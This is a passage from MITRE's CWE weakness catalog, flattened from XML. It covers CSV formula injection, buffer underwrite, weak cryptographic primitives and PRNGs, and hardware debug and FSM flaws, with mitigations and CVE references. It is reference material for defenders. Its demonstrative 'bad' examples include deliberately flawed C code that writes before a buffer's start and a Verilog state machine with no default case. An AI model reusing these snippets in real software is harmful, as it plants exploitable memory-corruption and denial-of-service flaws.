prior to use. Use SparseArrays or ArrayMap instead of HashMap to avoid performance overhead. - - - - - Java has a boxed primitive for each primitive type. A long can be represented with the boxed primitive Long. Issues arise where boxed primitives are used when not strictly necessary. - - Long count = 0L; - - for (long i = 0; i < Integer.MAX_VALUE; i++) { - - count += i; - - - } - - - In the above loop, we see that the count variable is declared as a boxed primitive. This causes autoboxing on the line that increments. This causes execution to be magnitudes less performant (time and possibly space) than if the "long" primitive was used to declare the count variable, which can impact availability of a resource. - - - This code uses primitive long which fixes the issue. - - long count = 0L; - - for (long i = 0; i < Integer.MAX_VALUE; i++) { - - count += i; - - - } - - - - - - - EXP04-J - Do not pass arguments to certain Java Collections Framework methods that are a different type than the collection parameter type - - - - - - - - - Joe Harvey - 2019-10-14 - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - The software saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by spreadsheet software. - User-provided data is often saved to traditional databases. This data can be exported to a CSV file, which allows users to read the data using spreadsheet software such as Excel, Numbers, or Calc. This software interprets entries beginning with '=' as formulas, which are then executed by the spreadsheet software. The software's formula language often allows methods to access hyperlinks or the local command line, and frequently allows enough characters to invoke an entire script. Attackers can populate data fields which, when saved to a CSV file, may attempt information exfiltration or other malicious activity when automatically executed by the spreadsheet software. - - - - - - - - - - - - - CSV Injection - - - Formula Injection - - - Excel Macro Injection - - - - - Implementation - The weakness is in the implementation of a software's CSV export feature, in particular how it formats formula entries as the output gets flattened into a text file. - - - - - Confidentiality - Read Application Data - Execute Unauthorized Code or Commands - Low - Current versions of Excel warn users of untrusted content. - - - - - Implementation - When generating CSV output, ensure that formula-sensitive metacharacters are effectively escaped or removed from all data before storage in the resultant CSV. Risky characters include '=' (equal), '+' (plus), '-' (minus), and '@' (at). - Moderate - Unfortunately, there is no perfect solution, since different spreadsheet products act differently. - - - Implementation - If a field starts with a formula character, prepend it with a ' (single apostrophe), which prevents Excel from executing the formula. - Moderate - It is not clear how effective this mitigation is with other spreadsheet software. - - - Architecture and Design - Certain implementations of spreadsheet software might disallow formulas from executing if the file is untrusted, or if the file is not authored by the current user. - Limited - This mitigation has limited effectiveness because it often depends on end users opening spreadsheet software safely. - - - - - Hyperlinks or other commands can be executed when a cell begins with the formula identifier, '=' - - =HYPERLINK(link_location, [friendly_name]) - - Stripping the leading equals sign, or simply not executing formulas from untrusted sources, impedes malicious activity. - - HYPERLINK(link_location, [friendly_name]) - - - - - - CVE-2019-12134 - Low privileged user can trigger CSV injection through a contact form field value - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12134 - - - CVE-2019-4521 - Cloud management product allows arbitrary command execution via CSV injection - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-4521 - - - CVE-2019-17661 - CSV injection in content management system via formula code in a first or last name - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17661 - - - - - - - - - - - CWE Content Team - MITRE - 2019-11-21 - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Description, Potential_Mitigations - - - - - The hardware product does not properly clear sensitive information from built-in registers when the user of the hardware block changes. - Hardware logic operates on data stored in registers local to the hardware block. Most hardware IPs, including cryptographic accelerators, rely on registers to buffer I/O, store intermediate values, and interface with software. The result of this is that sensitive information, such as passwords or encryption keys, can exist in locations not transparent to the user of the hardware logic. When a different entity obtains access to the IP due to a change in operating mode or conditions, the new entity can extract information belonging to the previous user if no mechanisms are in place to clear register contents. It is important to clear information stored in the hardware if a physical attack on the product is detected, or if the user of the hardware block changes. The process of clearing register contents in a hardware IP is referred to as zeroization in standards for cryptographic hardware modules such as FIPS-140-2 [REF-267]. - - - - - - - - - - - - - Architecture and Design - Lack of hardware mechanisms to zeroize or clear registers in the design or specification. - - - Implementation - Mechanisms to zeroize and clear registers are in the design but implemented incorrectly. - - - Operation - Hardware-provided zeroization mechanisms are not used appropriately by the IP user (ex. firmware), or data remanence issues are not taken into account. - - - - - Confidentiality - Varies by Context - The consequences will depend on the information disclosed due to the vulnerability. - - - - - Architecture and Design - Every register potentially containing sensitive information must have a policy specifying how and when information is cleared, in addition to clarifying if it is the responsibility of the hardware logic or IP user to initiate the zeroization procedure at the appropriate time. - Unfortunately, data disclosure can occur even after information has been overwritten/zeroized from the digital perspective. Physical characteristics of the memory can reveal the history of previously written data. For example, if the same value is written repeatedly to a memory location, the corresponding memory cells can become physically altered to a degree that even if the original data is erased it can still be recovered through physical characterization of the memory cells [REF-1055]. - - - - - Suppose a hardware IP for implementing an encryption routine works as expected, but it leaves the intermediate results in some registers that can be accessed. Exactly why this access happens is immaterial - it might be unintentional or intentional, where the designer wanted a "quick fix" for something. - - - - - - - - - - - - - - - Nicole Fern - Tortuga Logic - 2020-02-08 - - - CWE Content Team - MITRE - 2020-08-20 - updated Related_Attack_Patterns - - - - - The software writes to a buffer using an index or pointer that references a memory location prior to the beginning of the buffer. - This typically occurs when a pointer or its index is decremented to a position before the buffer, when pointer arithmetic results in a position before the beginning of the valid memory location, or when a negative index is used. - - - - - - - Primary - - - - - - - - - buffer underrun - Some prominent vendors and researchers use the term "buffer underrun". "Buffer underflow" is more commonly used, although both terms are also sometimes used to describe a buffer under-read (CWE-127). - - - - - Architecture and Design - - - Implementation - - - Medium - - - Integrity - Availability - Modify Memory - DoS: Crash, Exit, or Restart - Out of bounds memory access will very likely result in the corruption of relevant memory, and perhaps instructions, possibly leading to a crash. - - - Integrity - Confidentiality - Availability - Access Control - Other - Execute Unauthorized Code or Commands - Modify Memory - Bypass Protection Mechanism - Other - If the corrupted memory can be effectively controlled, it may be possible to execute arbitrary code. If the corrupted memory is data rather than instructions, the system will continue to function with improper changes, possibly in violation of an implicit or explicit policy. The consequences would only be limited by how the affected data is used, such as an adjacent memory location that is used to specify whether the user has special privileges. - - - Access Control - Other - Bypass Protection Mechanism - Other - When the consequence is arbitrary code execution, this can often be used to subvert any other security service. - - - - - Requirements - Choose a language that is not susceptible to these issues. - - - Implementation - All calculated values that are used as index or for pointer arithmetic should be validated to ensure that they are within an expected range. - - - - - In the following C/C++ example, a utility function is used to trim trailing whitespace from a character string. The function copies the input string to a local character string and uses a while statement to remove the trailing whitespace by moving backward through the string and overwriting whitespace with a NUL character. - - char* trimTrailingWhitespace(char *strMessage, int length) { - char *retMessage;char *message = malloc(sizeof(char)*(length+1)); - - // copy input string to a temporary string - char message[length+1];int index;for (index = 0; index < length; index++) {message[index] = strMessage[index];}message[index] = '\0'; - - // trim trailing whitespace - int len = index-1;while (isspace(message[len])) {message[len] = '\0';len--;} - - // return string without trailing whitespace - retMessage = message;return retMessage; - } - - However, this function can cause a buffer underwrite if the input character string contains all whitespace. On some systems the while statement will move backwards past the beginning of a character string and will call the isspace() function on an address outside of the bounds of the local buffer. - - - The following is an example of code that may result in a buffer underwrite, if find() returns a negative value to indicate that ch is not found in srcBuf: - - int main() {...strncpy(destBuf, &srcBuf[find(srcBuf, ch)], 1024);...} - - If the index to srcBuf is somehow under user control, this is an arbitrary write-what-where condition. - - - - - CVE-2021-24018 - buffer underwrite in firmware verification routine allows code execution via a crafted firmware image - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24018 - - - CVE-2002-2227 - Unchecked length of SSLv2 challenge value leads to buffer underflow. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2227 - - - CVE-2007-4580 - Buffer underflow from a small size value with a large buffer (length parameter inconsistency, CWE-130) - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4580 - - - CVE-2007-1584 - Buffer underflow from an all-whitespace string, which causes a counter to be decremented before the buffer while looking for a non-whitespace character. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1584 - - - CVE-2007-0886 - Buffer underflow resultant from encoded data that triggers an integer overflow. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0886 - - - CVE-2006-6171 - Product sets an incorrect buffer size limit, leading to "off-by-two" buffer underflow. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6171 - - - CVE-2006-4024 - Negative value is used in a memcpy() operation, leading to buffer underflow. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4024 - - - CVE-2004-2620 - Buffer underflow due to mishandled special characters - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2620 - - - - - UNDER - Boundary beginning violation ('buffer underflow'?) - - - Buffer underwrite - - - SFP8 - Faulty Buffer Access - - - - - - - - This could be resultant from several errors, including a bad offset or an array index that decrements before the beginning of the buffer (see CWE-129). - Much attention has been paid to buffer overflows, but "underflows" sometimes exist in products that are relatively free of overflows, so it is likely that this variant has been under-studied. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Description, Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-01-12 - updated Common_Consequences - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Demonstrative_Examples, References - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Potential_Mitigations - - Boundary Beginning Violation ('Buffer Underwrite') - - - - To fulfill the need for a cryptographic primitive, the product implements a cryptographic algorithm using a non-standard, unproven, or disallowed/non-compliant cryptographic implementation. - - Cryptographic protocols and systems depend on cryptographic primitives (and associated algorithms) as their basic building blocks. Some common examples of primitives are digital signatures, one-way hash functions, ciphers, and public key cryptography; however, the notion of "primitive" can vary depending on point of view. See "Terminology Notes" for further explanation of some concepts. - Cryptographic primitives are defined to accomplish one very specific task in a precisely defined and mathematically reliable fashion. For example, suppose that for a specific cryptographic primitive (such as an encryption routine), the consensus is that the primitive can only be broken after trying out N different inputs (where the larger the value of N, the stronger the cryptography). For an encryption scheme like AES-256, one would expect N to be so large as to be infeasible to execute in a reasonable amount of time. - If a vulnerability is ever found that shows that one can break a cryptographic primitive in significantly less than the expected number of attempts, then that primitive is considered weakened (or sometimes in extreme cases, colloquially it is "broken"). As a result, anything using this cryptographic primitive would now be considered insecure or risky. Thus, even breaking or weakening a seemingly small cryptographic primitive has the potential to render the whole system vulnerable, due to its reliance on the primitive. A historical example can be found in TLS when using DES. One would colloquially call DES the cryptographic primitive for transport encryption in this version of TLS. In the past, DES was considered strong, because no weaknesses were found in it; importantly, DES has a key length of 56 bits. Trying N=2^56 keys was considered impractical for most actors. Unfortunately, attacking a system with 56-bit keys is now practical via brute force, which makes defeating DES encryption practical. It is now practical for an adversary to read any information sent under this version of TLS and use this information to attack the system. As a result, it can be claimed that this use of TLS is weak, and that any system depending on TLS with DES could potentially render the entire system vulnerable to attack. - - Cryptographic primitives and associated algorithms are only considered safe after extensive research and review from experienced cryptographers from academia, industry, and government entities looking for any possible flaws. Furthermore, cryptographic primitives and associated algorithms are frequently reevaluated for safety when new mathematical and attack techniques are discovered. As a result and over time, even well-known cryptographic primitives can lose their compliance status with the discovery of novel attacks that might either defeat the algorithm or reduce its robustness significantly. - If ad-hoc cryptographic primitives are implemented, it is almost certain that the implementation will be vulnerable to attacks that are well understood by cryptographers, resulting in the exposure of sensitive information and other consequences. - This weakness is even more difficult to manage for hardware-implemented deployment of cryptographic algorithms. First, because hardware is not patchable as easily as software, any flaw discovered after release and production typically cannot be fixed without a recall of the product. Secondly, the hardware product is often expected to work for years, during which time computation power available to the attacker only increases. Therefore, for hardware implementations of cryptographic primitives, it is absolutely essential that only strong, proven cryptographic primitives are used. - - - - - - - Primary - - - - - - - - - - - Architecture and Design - This weakness is primarily introduced during the architecture and design phase as risky primitives are included. - - - Implementation - Even in cases where the Architectural phase properly specifies a cryptographically secure design, the design may be changed during implementation due to unforeseen constraints. - - - - - Confidentiality - Read Application Data - High - Incorrect usage of crypto primitives could render the supposedly encrypted data as unencrypted plaintext in the worst case. - - - - - Architecture or Design Review - Review requirements, documentation, and product design to ensure that primitives are consistent with the strongest-available recommendations from trusted parties. If the product appears to be using custom or proprietary implementations that have not had sufficient public review and approval, then this is a significant concern. - High - - - Manual Analysis - Analyze the product to ensure that implementations for each primitive do not contain any known vulnerabilities and are not using any known-weak algorithms, including MD4, MD5, SHA1, DES, etc. - Moderate - - - Dynamic Analysis with Manual Results Interpretation - For hardware, during the implementation (pre-Silicon / post-Silicon) phase, dynamic tests should be done to ensure that outputs from cryptographic routines are indeed working properly, such as test vectors provided by NIST [REF-1236]. - Moderate - - - Dynamic Analysis with Manual Results Interpretation - - It needs to be determined if the output of a cryptographic primitive is lacking entropy, which is one clear sign that something went wrong with the crypto implementation. There exist many methods of measuring the entropy of a bytestream, from sophisticated ones (like calculating Shannon's entropy of a sequence of characters) to crude ones (by compressing it and comparing the size of the original bytestream vs. the compressed - a truly random byte stream should not be compressible and hence the uncompressed and compressed bytestreams should be nearly identical in size). - Moderate - - - - - Requirements - - Require compliance with the strongest-available recommendations from trusted parties, and require that compliance must be kept up-to-date, since recommendations evolve over time. For example, US government systems require FIPS 140-3 certification, which supersedes FIPS 140-2 [REF-1192] [REF-1226]. - - High - - - Architecture and Design - - Ensure that the architecture/design uses the strongest-available primitives and algorithms from trusted parties. For example, US government systems require FIPS 140-3 certification, which supersedes FIPS 140-2 [REF-1192] [REF-1226]. - - High - - - Architecture and Design - - Do not develop custom or private cryptographic algorithms. They will likely be exposed to attacks that are well-understood by cryptographers. As with all cryptographic mechanisms, the source code should be available for analysis. If the algorithm may be compromised when attackers find out how it works, then it is especially weak. - - Discouraged Common Practice - - - Architecture and Design - - Try not to use cryptographic algorithms in novel ways or with new modes of operation even when you "know" it is secure. For example, using SHA-2 chaining to create a 1-time pad for encryption might sound like a good idea, but one should not do this. - - Discouraged Common Practice - - - Architecture and Design - Ensure that the design can replace one cryptographic primitive or algorithm with another in the next generation ("cryptographic agility"). Where possible, use wrappers to make the interfaces uniform. This will make it easier to upgrade to stronger algorithms. This is especially important for hardware, which can be more difficult to upgrade quickly than software; design the hardware at a replaceable block level. - Defense in Depth - - - Architecture and Design - - Do not use outdated or non-compliant cryptography algorithms. Some older algorithms, once thought to require a billion years of computing time, can now be broken in days or hours. This includes MD4, MD5, SHA1, DES, and other algorithms that were once regarded as strong [REF-267]. - - Discouraged Common Practice - - - Architecture and Design - Implementation - - Do not use a linear-feedback shift register (LFSR) or other legacy methods as a substitute for an accepted and standard Random Number Generator. - - Discouraged Common Practice - - - Architecture and Design - Implementation - - Do not use a checksum as a substitute for a cryptographically generated hash. - - Discouraged Common Practice - - - Architecture and Design - Libraries or Frameworks - - Use a vetted cryptographic library or framework. Industry-standard implementations will save development time and are more likely to avoid errors that can occur during implementation of cryptographic algorithms. However, the library/framework could be used incorrectly during implementation. - - High - - - Architecture and Design - Implementation - - When using industry-approved techniques, use them correctly. Don't cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for the prevention of common attacks. - - Moderate - - - Architecture and Design - Implementation - - Do not store keys in areas accessible to untrusted agents. Carefully manage and protect the cryptographic keys (see CWE-320). If the keys can be guessed or stolen, then the strength of the cryptography algorithm is irrelevant. - - Moderate - - - - - Re-using random values may compromise security. - Suppose an Encryption algorithm needs a random value for a key. Instead of using a DRNG (Deterministic Random Number Generator), the designer uses a linear-feedback shift register (LFSR) to generate the value. - While an LFSR may provide pseudo-random number generation service, the entropy (measure of randomness) of the resulting output may be less than that of an accepted DRNG (like that used in dev/urandom). Thus, using an LFSR weakens the strength of the cryptographic system, because it may be possible for an attacker to guess the LFSR output and subsequently the encryption key. - If a cryptographic algorithm expects a random number as its input, provide one. Do not provide a pseudo-random value. - - - - - CVE-2020-4778 - software uses MD5, which is less safe than the default SHA-256 used by related products - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4778 - - - CVE-2005-2946 - Default configuration of product uses MD5 instead of stronger algorithms that are available, simplifying forgery of certificates. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2946 - - - CVE-2019-3907 - identity card uses MD5 hash of a salt and password - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3907 - - - CVE-2021-34687 - personal key is transmitted over the network using a substitution cipher - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34687 - - - CVE-2020-14254 - product does not disable TLS-RSA cipher suites, allowing decryption of traffic if TLS 2.0 and secure ciphers are not enabled. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14254 - - - CVE-2019-1543 - SSL/TLS library generates 16-byte nonces but reduces them to 12 byte nonces for the ChaCha20-Poly1305 cipher, converting them in a way that violates the cipher's requirements for unique nonces. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1543 - - - CVE-2017-9267 - LDAP interface allows use of weak ciphers - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9267 - - - CVE-2017-7971 - SCADA product allows "use of outdated cipher suites" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7971 - - - CVE-2020-6616 - Chip implementing Bluetooth uses a low-entropy PRNG instead of a hardware RNG, allowing spoofing. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6616 - - - CVE-2019-1715 - security product has insufficient entropy in the DRBG, allowing collisions and private key discovery - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1715 - - - CVE-2014-4192 - Dual_EC_DRBG implementation in RSA toolkit does not correctly handle certain byte requests, simplifying plaintext recovery - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4192 - - - CVE-2007-6755 - Recommendation for Dual_EC_DRBG algorithm contains point Q constants that could simplify decryption - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6755 - - - - - - - - - - - - - - - - Terminology for cryptography varies widely, from informal and colloquial to mathematically-defined, with different precision and formalism depending on whether the stakeholder is a developer, cryptologist, etc. Yet there is a need for CWE to be self-consistent while remaining understandable and acceptable to multiple audiences. - As of CWE 4.6, CWE terminology around "primitives" and "algorithms" is emerging as shown by the following example, subject to future consultation and agreement within the CWE and cryptography communities. Suppose one wishes to send encrypted data using a CLI tool such as OpenSSL. One might choose to use AES with a 256-bit key and require tamper protection (GCM mode, for instance). For compatibility's sake, one might also choose the ciphertext to be formatted to the PKCS#5 standard. In this case, the "cryptographic system" would be AES-256-GCM with PKCS#5 formatting. The "cryptographic function" would be AES-256 in the GCM mode of operation, and the "algorithm" would be AES. Colloquially, one would say that AES (and sometimes AES-256) is the "cryptographic primitive," because it is the algorithm that realizes the concept of symmetric encryption (without modes of operation or other protocol related modifications). In practice, developers and architects typically refer to base cryptographic algorithms (AES, SHA, etc.) as cryptographic primitives. - - Since CWE 4.4, various cryptography-related entries, including CWE-327 and CWE-1240, have been slated for extensive research, analysis, and community consultation to define consistent terminology, improve relationships, and reduce overlap or duplication. As of CWE 4.6, this work is still ongoing. - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-02-10 - - - CWE Content Team - MITRE - 2020-08-20 - updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns, Research_Gaps - - - CWE Content Team - MITRE - 2021-07-20 - updated Maintenance_Notes, Research_Gaps - - - Parbati K. Manna - Intel Corporation - 2021-10-18 - provided detection methods and observed examples - - - - - The device uses an algorithm that is predictable and generates a pseudo-random number. - - - - - - - - - Architecture and Design - - - Implementation - In many cases, the design originally defines a cryptographically secure random number generator, but is then changed during implementation due to unforeseen constraints. - - - - - Confidentiality - Read Application Data - High - - - - - Architecture and Design - A true random number generator should be specified for cryptographic algorithms. - - - Implementation - A true random number generator should be implemented for cryptographic algorithms. - - - - - Suppose a cryptographic function expects random value to be supplied for the crypto algorithm. - During the implementation phase, due to space constraint, a cryptographically secure random-number-generator could not be used, and instead of using a TRNG (True Random Number Generator), a LFSR (Linear Feedback Shift Register) is used to generate a random value. While an LFSR will provide a pseudo-random number, its entropy (measure of randomness) is insufficient for a cryptographic algorithm. - - - - - - - As of CWE 4.5, terminology related to randomness, entropy, and - predictability can vary widely. Within the developer and other - communities, "randomness" is used heavily. However, within - cryptography, "entropy" is distinct, typically implied as a - measurement. There are no commonly-used definitions, even within - standards documents and cryptography papers. Future versions of - CWE will attempt to define these terms and, if necessary, - distinguish between them in ways that are appropriate for - different communities but do not reduce the usability of CWE for - mapping, understanding, or other scenarios. - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-02-10 - - - CWE Content Team - MITRE - 2020-06-25 - updated Common_Consequences, Demonstrative_Examples, Modes_of_Introduction - - - CWE Content Team - MITRE - 2020-08-20 - updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns, Research_Gaps - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes, Research_Gaps - - - CWE Content Team - MITRE - 2021-07-20 - updated Maintenance_Notes - - - - - The device includes chicken bits or undocumented features that can create entry points for unauthorized actors. - - A common design practice is to use undocumented bits on a device that can be used to disable certain functional security features. These bits are commonly referred to as "chicken bits". They can facilitate quick identification and isolation of faulty components, features that negatively affect performance, or features that do not provide the required controllability for debug and test. Another way to achieve this is through implementation of undocumented features. An attacker might exploit these interfaces for unauthorized access. - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - Documentation - - - - - Confidentiality - Integrity - Availability - Access Control - Modify Memory - Read Memory - Execute Unauthorized Code or Commands - Gain Privileges or Assume Identity - Bypass Protection Mechanism - - - - - Architecture and Design - Implementation - - The implementation of chicken bits in a released product is highly discouraged. If implemented at all, ensure that they are disabled in production devices. All interfaces to a device should be documented. - - High - - - - - Consider a device that comes with various security measures, such as secure boot. The secure-boot process performs firmware-integrity verification at boot time, and this code is stored in a separate SPI-flash device. However, this code contains undocumented "special access features" intended to be used only for performing failure analysis and intended to only be unlocked by the device designer. - - Attackers dump the code from the device and then perform reverse engineering to analyze the code. The undocumented, special-access features are identified, and attackers can activate them by sending specific commands via UART before secure-boot phase completes. Using these hidden features, attackers can perform reads and writes to memory via the UART interface. At runtime, the attackers can also execute arbitrary code and dump the entire memory contents. - - Remove all chicken bits and hidden features that are exposed to attackers. Add authorization schemes that rely on cryptographic primitives to access any features that the manufacturer does not want to expose. Clearly document all interfaces. - - - - - - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-02-13 - - - CWE Content Team - MITRE - 2020-08-20 - updated Applicable_Platforms, Demonstrative_Examples, Description, Potential_Mitigations, Related_Attack_Patterns - - - - - Access to security-sensitive information stored in fuses is not limited during debug. - - Several security-sensitive values are programmed into fuses to be used during early-boot flows or later at runtime. Examples of these security-sensitive values include root keys, encryption keys, manufacturing-specific information, chip-manufacturer-specific information, and original-equipment-manufacturer (OEM) data. After the chip is powered on, these values are sensed from fuses and stored in temporary locations such as registers and local memories. These locations are typically access-control protected from untrusted agents capable of accessing them. Even to trusted agents, only read-access is provided. However, these locations are not blocked during debug operations, allowing a user to access this sensitive information. - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Access Control - Modify Memory - Bypass Protection Mechanism - - - - - Architecture and Design - Implementation - - Disable access to security-sensitive information stored in fuses directly and also reflected from temporary storage locations when in debug mode. - - - - - - Sensitive manufacturing data (such as die information) are stored in fuses. When the chip powers on, these values are read from the fuses and stored in microarchitectural registers. These registers are only given read access to trusted software running on the core. Untrusted software running on the core is not allowed to access these registers. - - All microarchitectural registers in this chip can be accessed through the debug interface. As a result, even an untrusted debugger can access this data and retrieve sensitive manufacturing data. - - - Registers used to store sensitive values read from fuses should be blocked during debug. These registers should be disconnected from the debug interface. - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-02-12 - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Potential_Mitigations, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2021-03-15 - updated Description - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - Exposure of Security-Sensitive Fuse Values During Debug - - - - - The product uses physical debug or test - interfaces with support for multiple access levels, but it - assigns the wrong debug access level to an internal asset, - providing unintended access to the asset from untrusted debug - agents. - - - Debug authorization can have multiple levels of - access, defined such that different system internal assets - are accessible based on the current authorized debug - level. Other than debugger authentication (e.g., using - passwords or challenges), the authorization can also be - based on the system state or boot stage. For example, full - system debug access might only be allowed early in boot - after a system reset to ensure that previous session data is - not accessible to the authenticated debugger. - - If this protection mechanism does not ensure that - internal assets have the correct debug access level during - each boot stage or change in system state, an attacker could - obtain sensitive information from the internal asset using a - debugger. - - - - - - - Primary - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Read Memory - - - Integrity - Modify Memory - - - Authorization - Access Control - Gain Privileges or Assume Identity - Bypass Protection Mechanism - - - - - Manual Analysis - Check 2 devices for their passcode to authenticate access to JTAG/debugging ports. If the passcodes are missing or the same, update the design to fix and retest. Check communications over JTAG/debugging ports for encryption. If the communications are not encrypted, fix the design and retest. - Moderate - - - - - Architecture and Design - Implementation - - For security-sensitive assets accessible over debug/test interfaces, only allow trusted agents. - - High - - - Architecture and Design - Apply blinding [REF-1219] or masking techniques in strategic areas. - Limited - - - Implementation - Add shielding or tamper-resistant protections to the device, which increases the difficulty and cost for accessing debug/test interfaces. - Limited - - - - - The JTAG interface is used to perform debugging and provide CPU core access for developers. JTAG-access protection is implemented as part of the JTAG_SHIELD bit in the hw_digctl_ctrl register. This register has no default value at power up and is set only after the system boots from ROM and control is transferred to the user software. - - - - - 1 bit - 0x0 = JTAG debugger is enabled (default) - - - JTAG_SHIELD - 0x1 = JTAG debugger is disabled - - - - - This means that since the end user has access to JTAG at system reset and during ROM code execution before control is transferred to user software, a JTAG user can modify the boot flow and subsequently disclose all CPU information, including data-encryption keys. - - The default value of this register bit should be set to 1 to prevent the JTAG from being enabled at system reset. - - - - - - CVE-2019-18827 - After ROM code execution, JTAG access is disabled. But before the ROM code is executed, JTAG access is possible, allowing a user full system access. This allows a user to modify the boot flow and successfully bypass the secure-boot process. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18827 - - - - - - - - - - - - - - - CWE-1191 and CWE-1244 both involve physical debug access, - but the weaknesses are different. CWE-1191 is effectively - about missing authorization for a debug interface, - i.e. JTAG. CWE-1244 is about providing internal assets with - the wrong debug access level, exposing the asset to - untrusted debug agents. - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - Intel Corporation - 2020-02-12 - - - CWE Content Team - MITRE - 2020-08-20 - updated Demonstrative_Examples, Name, Observed_Examples, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2021-03-15 - updated Maintenance_Notes - - - Hareesh Khattri - Intel Corporation - 2021-10-22 - clarified differences between CWE-1191 and CWE-1244, and suggested rephrasing of descriptions and names. - - Improper Authorization on Physical Debug and Test Interfaces - - - - Faulty finite state machines (FSMs) in the hardware logic allow an attacker to put the system in an undefined state, to cause a denial of service (DoS) or gain privileges on the victim's system. - - The functionality and security of the system heavily depend on the implementation of FSMs. FSMs can be used to indicate the current security state of the system. Lots of secure data operations and data transfers rely on the state reported by the FSM. Faulty FSM designs that do not account for all states, either through undefined states (left as don't cares) or through incorrect implementation, might lead an attacker to drive the system into an unstable state from which the system cannot recover without a reset, thus causing a DoS. Depending on what the FSM is used for, an attacker might also gain additional privileges to launch further attacks and compromise the security guarantees. - - - - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Availability - Access Control - Unexpected State - DoS: Crash, Exit, or Restart - DoS: Instability - Gain Privileges or Assume Identity - - - - - Architecture and Design - Implementation - Define all possible states and handle all unused states through default statements. Ensure that system defaults to a secure state. - High - - - - - The FSM shown in the "bad" code snippet below assigns the output out based on the value of state, which is determined based on the user provided input, user_input. - - module fsm_1(out, user_input, clk, rst_n); - input [2:0] user_input; - input clk, rst_n; - output reg [2:0] out; - reg [1:0] state; - always @ (posedge clk or negedge rst_n ) - - begin - - if (!rst_n) - state = 3'h0; - else - case (user_input) - - 3'h0: - 3'h1: - 3'h2: - 3'h3: state = 2'h3; - 3'h4: state = 2'h2; - 3'h5: state = 2'h1; - - endcase - - end - out <= {1'h1, state}; - - endmodule - - - - The case statement does not handle the scenario when user provides inputs of 3'h6 and 3'h7 using a default statement. Those inputs push the system to an undefined state and might cause a crash (denial of service) or any other unanticipated outcome. - Adding a default statement to handle undefined inputs mitigates this issue. This is shown in the "Good" code snippet below. The default statement is in bold. - - - case (user_input) - 3'h0: - 3'h1: - 3'h2: - 3'h3: state = 2'h3; - 3'h4: state = 2'h2; - 3'h5: state = 2'h1; - default: state = 2'h0; - - endcase - - - - - - - - - - - - Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi - The Intel Corporation - 